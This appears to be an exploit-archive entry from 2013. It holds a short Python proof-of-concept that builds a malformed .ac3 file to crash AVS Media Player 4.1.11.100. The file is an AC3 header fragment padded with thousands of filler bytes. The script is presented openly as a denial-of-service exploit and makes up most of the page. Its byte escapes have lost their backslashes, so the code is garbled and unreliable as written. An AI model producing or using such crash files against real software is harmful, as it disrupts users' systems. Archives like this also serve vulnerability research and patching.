AVS Media Player 4.1.11.100 (.ac3)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AVS Media Player 4.1.11.100 (.ac3) - Denial of Service
# Published : 2013-07-01
# Author :
# Previous Title : Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow
# Next Title : SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow

#!/usr/bin/python
print """
 [+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit
 [+]Vulnerable Product:4.1.11.100
 [+]Download Product:http://www.avs4you.com/de/downloads.aspx
 [+]All AVS4YOU Software has problems with format .ac3
 [+]Date: 29.06.2013
 [+]Exploit Author: metacom
 [+]RST
 [+]Tested on: Windows 7
 """

buffer=(
"x0Bx77x3Ex68x50x40x43xE1x06xA0xB9"
"x65xFFx3AxBEx7CxF9xF3xE7xCFx9Fx3E"
)

junk = "x41" * 5000
bob = "x42" * 100

exploit = buffer+ junk + bob
 
try:
    rst= open("exploit.ac3",'w')
    rst.write(exploit)
    rst.close()
    print("nExploit file created!n")
except:
    print "Error"